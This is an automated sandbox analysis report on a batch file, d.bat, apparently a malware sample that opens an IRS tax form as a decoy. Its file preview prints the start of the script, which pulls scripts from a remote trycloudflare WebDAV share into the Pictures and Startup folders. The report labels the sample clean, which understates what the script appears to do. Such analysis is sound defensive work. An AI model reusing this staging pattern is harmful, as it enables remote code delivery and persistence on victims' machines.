Windows
Analysis Report
d.bat
Overview
General Information
Detection
Score: | 3 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 80% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 1532 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\d.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chrome.exe (PID: 4036 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// www.irs.go v/pub/irs- pdf/f1040. pdf MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6584 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2064 --fi eld-trial- handle=202 0,i,869062 2242313858 414,129182 0735043739 184,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- cleanup
Click to jump to signature section
There are no malicious signatures, click here to show all signatures.
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: |
Source: | Window detected: |
Source: | File created: | |||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Process information set: | Jump to behavior |
Source: | Last function: |
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
www.google.com | 142.250.9.104 | true | false | high | |
www.irs.gov | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false |
| low |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
239.255.255.250 | unknown | Reserved | unknown | unknown | false | |
142.250.9.104 | www.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.5 |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1431649 |
Start date and time: | 2024-04-25 15:11:10 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 22s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | d.bat |
Detection: | CLEAN |
Classification: | clean3.winBAT@22/14@6/3 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 74.125.136.94, 23.223.135.219, 172.253.124.100, 172.253.124.101, 172.253.124.102, 172.253.124.138, 172.253.124.113, 172.253.124.139, 142.251.15.84, 34.104.35.123, 192.229.211.108, 199.232.214.172, 74.125.138.94, 23.40.205.49, 74.125.136.138, 74.125.136.139, 74.125.136.102, 74.125.136.100, 74.125.136.101, 74.125.136.113
- Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, www.irs.gov.edgekey.net, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e3920.dscna.akamaiedge.net, update.googleapis.com, clients.l.google.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenFile calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
239.255.255.250 | Get hash | malicious | HTMLPhisher | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
28a2c9bd18a11de089ef85a160da29e4 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT | Browse |
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2677 |
Entropy (8bit): | 3.979057681936079 |
Encrypted: | false |
SSDEEP: | 48:8SdTTbv/HfidAKZdA19ehwiZUklqehTy+3:86vZsy |
MD5: | DB39BFAB7983A1D0C19C7CD555B7F1F5 |
SHA1: | FCF24029FF1C651A6CFAB744EBFB5612330699C7 |
SHA-256: | 2DAAC444C93A503968274C3CECE2E69556315448AA4A04F46079592A19DB5681 |
SHA-512: | 33BD033BD074E127EE718116E10D1732939B2C078619910253DA3BC58550C467A7F39E858B2E8EC12B92A49D23D1DA1F3AC2311A80288939B7C34819772B3932 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2679 |
Entropy (8bit): | 3.9964520526391043 |
Encrypted: | false |
SSDEEP: | 48:8XdTTbv/HfidAKZdA1weh/iZUkAQkqehcy+2:8hvL9Qxy |
MD5: | 0B22EEDC6B1CCA6D3BB36C5BBB003281 |
SHA1: | 33AEA8DEEA16BD79F4D842A09EBC80FD3B4C48BD |
SHA-256: | 44F46499CA12F045F05C055D8954A40C7435D8A1BBA7A48748337511160BC2E8 |
SHA-512: | 8011B69C32DAFABD622256782F8F5FEB57516682EF36E0EAB3E0B8B54A8BCF8A3FAF81191CE8F0CA2A4887D8C9DE8508B60EBD99514FE9EF62DFB884C7D805F0 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2693 |
Entropy (8bit): | 4.005135031376133 |
Encrypted: | false |
SSDEEP: | 48:8xYdTTbvsHfidAKZdA14tseh7sFiZUkmgqeh7s6y+BX:8xkvenoy |
MD5: | 02D36C96E61D2D6DB3D1036FC17A3B41 |
SHA1: | B5EF61F0A62490E062FA117234B6B76D49F3129E |
SHA-256: | AF0B7FD9A2A4F737875881998AFBC6773CEEA3E15E0773A6E62B55E31A25017E |
SHA-512: | AB18C13A96040FF052347FB4FF9A73A62B0E9F24C43E952EF4F2C0A3887DF5B371F22DDA4FBDE3D7591F220E388A2C538B67502CC85E9EA14F2C598C8A34D604 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2681 |
Entropy (8bit): | 3.994808721032563 |
Encrypted: | false |
SSDEEP: | 48:83dTTbv/HfidAKZdA1vehDiZUkwqehQy+R:8BvIiy |
MD5: | 4A589436D7814F2752332896E780BCF6 |
SHA1: | 9DD685FDD5E2169FF8F6E091DF1ABD4567FC0E3D |
SHA-256: | 9788822CEC6318EFD8BDD6CA3B76A17A2B6EBE4920828263CC11D44FA6EE435F |
SHA-512: | C67503BF16E541890F0B60E0660C5B169C12CCC9D38D50995BF486780AFF012AEF0BFE9423528491B26137B5A25BF757FFBE549ECE3C08DCE73251D6C8EA0833 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2681 |
Entropy (8bit): | 3.982313351680813 |
Encrypted: | false |
SSDEEP: | 48:8VdTTbv/HfidAKZdA1hehBiZUk1W1qehWy+C:8bvY92y |
MD5: | E759CB25D380344C1C6A21399CF1AFDA |
SHA1: | D7C165407AD27C21C05EA4ED23E3BBCAAB1ABF75 |
SHA-256: | 3FD51442EF5B087FC9FB9151100F5640A9AD5CA372F474A05C6EB06DC13CD98C |
SHA-512: | 62567050358C6B29CA1032BFC1D984B549BA5028710CFF2D7A614D40ED4848E8D9080BA9CFF273EB63D3ED36A0D159AC3BE476DB018C43645A73D087828BECC6 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2683 |
Entropy (8bit): | 3.994975715439732 |
Encrypted: | false |
SSDEEP: | 48:8rdTTbv/HfidAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8dv2T/TbxWOvTboy7T |
MD5: | 86A05180D598F0E54077A53792C74861 |
SHA1: | 6F363577612C01DAE4F2EF96E3A7EFAAD21AC16E |
SHA-256: | A08F1CB292EF7179B7D23D1E07CBDB46ED6C184C162F17F28CD91659273F5E5E |
SHA-512: | 9860870C5B40A4ABA4D60D890E143FF22C5FBBDCAD0CA0D9D28CCAFC42BC1B3E651E4764796008C247A5443AD5AF2FDBD5FE26420DFBD1C365EB44EB06B07623 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 160747 |
Entropy (8bit): | 7.666827256964284 |
Encrypted: | false |
SSDEEP: | 3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk |
MD5: | 5355B0C5DEB635C613B45246475123C2 |
SHA1: | F00B85A4367F18DCE9D521935AEFD8B7B091735B |
SHA-256: | A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C |
SHA-512: | C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 160747 |
Entropy (8bit): | 7.666827256964284 |
Encrypted: | false |
SSDEEP: | 3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk |
MD5: | 5355B0C5DEB635C613B45246475123C2 |
SHA1: | F00B85A4367F18DCE9D521935AEFD8B7B091735B |
SHA-256: | A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C |
SHA-512: | C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15750 |
Entropy (8bit): | 7.914947273324376 |
Encrypted: | false |
SSDEEP: | 384:/Pf8gkrYKx8cgfXuvsmVfvPfDlRESkV+2R/Ay9driE:/PobGB8HJ3fBGlB/pdeE |
MD5: | DC35DF0427D1F321441176368EBDAD93 |
SHA1: | 82CE46CEB10C5A6AA7308AF9A7418284C8251542 |
SHA-256: | 727B6B03E7996760F47669CC082083CB4FBAE095F5E3D33C98C1DB050F863359 |
SHA-512: | CF4D276439DE5929AB7E88472B6DB03DE9BE2D1D86860592D09351681C7DD0B8956AE59746F0D6564264732FDAB54D20B3632A0531F13D2A4ECB5C63DFFFD07A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3638 |
Entropy (8bit): | 2.571036536899412 |
Encrypted: | false |
SSDEEP: | 24:OeP3VnSOcrTxoncyUjvAZgX7a7VFYuq8oPhhr2EsCtIDOLrie:ObDrTxtyUn7WPYXBCs |
MD5: | E7E7D53FDBC59F9B23B362F41FAD8990 |
SHA1: | EBA944D3003861B1E114D8997C2979B003F68087 |
SHA-256: | 6D63881E43E08EF385E6C809B43B2B289A459FB2F30D5159000E2477D776B456 |
SHA-512: | 8ADED0EC6D8F1118CE33479CB16F60A9115948CF09C57DA38292E24DE13B3B5C3942B8E6AEC82769C555FB22BFCB1F91E773C4673E7B6A34F5701EFF0397E259 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 3638 |
Entropy (8bit): | 2.571036536899412 |
Encrypted: | false |
SSDEEP: | 24:OeP3VnSOcrTxoncyUjvAZgX7a7VFYuq8oPhhr2EsCtIDOLrie:ObDrTxtyUn7WPYXBCs |
MD5: | E7E7D53FDBC59F9B23B362F41FAD8990 |
SHA1: | EBA944D3003861B1E114D8997C2979B003F68087 |
SHA-256: | 6D63881E43E08EF385E6C809B43B2B289A459FB2F30D5159000E2477D776B456 |
SHA-512: | 8ADED0EC6D8F1118CE33479CB16F60A9115948CF09C57DA38292E24DE13B3B5C3942B8E6AEC82769C555FB22BFCB1F91E773C4673E7B6A34F5701EFF0397E259 |
Malicious: | false |
URL: | https://www.irs.gov/themes/custom/pup_base/favicon.ico |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 160747 |
Entropy (8bit): | 7.666827256964284 |
Encrypted: | false |
SSDEEP: | 3072:H+GB66G6WwUTsiJM+5vz6ZDuteRPuZ3W11D84LCBUlWEHKr:eU66GwUTBMI+uQRPugjyUl7Hk |
MD5: | 5355B0C5DEB635C613B45246475123C2 |
SHA1: | F00B85A4367F18DCE9D521935AEFD8B7B091735B |
SHA-256: | A410CE39E1F9B75AB3DDD8C314B9E7DCE022ED6E3AEBDE5418A58B88F1E0213C |
SHA-512: | C31D5ACACE5FB498144290BA71DA016CF0E8CA38B85A026B77E62A1CA6AF5C21631B2836B624531FC43377DA54881FA6559395ED2A6883EA4582BC5ED7BF6278 |
Malicious: | false |
URL: | https://www.irs.gov/pub/irs-pdf/f1040.pdf |
Preview: |
File type: | |
Entropy (8bit): | 5.00221025750802 |
TrID: | |
File name: | d.bat |
File size: | 1'493 bytes |
MD5: | ff72478478ffdc769b1e68ebcae78ce7 |
SHA1: | de0dcdc73c62b379b197f85665d0f79ffd503e8c |
SHA256: | 37078a400954db8edd7717afb95f22d7fe119efedc4691bff4e7ca2470ece1c8 |
SHA512: | ca5cb63cbc5661189d3c5191ce1d4b28f29496839a9a7cf31948141cec7e34e0aa7054e94c409fb8dfc900531516b9946f17c3764cb4224c5e4bce0616f368ff |
SSDEEP: | 24:wh280zOMKuVMVxRbzrpQJkqgqy5eiQr9K5Hk0hSMXgGaOM+1wcTxnIdK9/ZDjeFv:k28qNKu6dpQJkq31jhK558TGeslxnIdr |
TLSH: | 653103521808413A4337A7BAB73859EEE50A504FD200751975EDC5B60F3528DC7B6BE4 |
File Content Preview: | @echo off..set source=\\hq-breach-alt-acknowledged.trycloudflare.com@SSL\DavWWWRoot..set destination=%USERPROFILE%\Pictures..set startup_folder=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup....REM Copy a.cmd, a.ps1, and ib.ps1 to the destination |
Icon Hash: | 9686878b929a9886 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 25, 2024 15:12:07.094077110 CEST | 49675 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:07.094077110 CEST | 49674 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:07.203501940 CEST | 49673 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:16.706228971 CEST | 49675 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:16.706229925 CEST | 49674 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:16.811434984 CEST | 49673 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:17.735681057 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.735760927 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.735836029 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.736057997 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.736093998 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.979747057 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.980123997 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.980160952 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.981527090 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:17.981580019 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.982920885 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:17.982990980 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:18.103143930 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:18.103188992 CEST | 443 | 49717 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:12:18.122967005 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.123029947 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.123106956 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.125169039 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.125205994 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.181680918 CEST | 443 | 49703 | 23.1.237.91 | 192.168.2.5 |
Apr 25, 2024 15:12:18.181787014 CEST | 49703 | 443 | 192.168.2.5 | 23.1.237.91 |
Apr 25, 2024 15:12:18.212440968 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:12:18.361244917 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.361368895 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.364238977 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.364262104 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.364670992 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.408225060 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.421142101 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.468147039 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.570722103 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.570868969 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.570986986 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.571048021 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.571048021 CEST | 49718 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.571086884 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.571125984 CEST | 443 | 49718 | 184.31.62.93 | 192.168.2.5 |
Apr 25, 2024 15:12:18.615158081 CEST | 49719 | 443 | 192.168.2.5 | 184.31.62.93 |
Apr 25, 2024 15:12:18.615210056 CEST | 443 | 49719 | 184.31.62.93 | 192.168.2.5 |
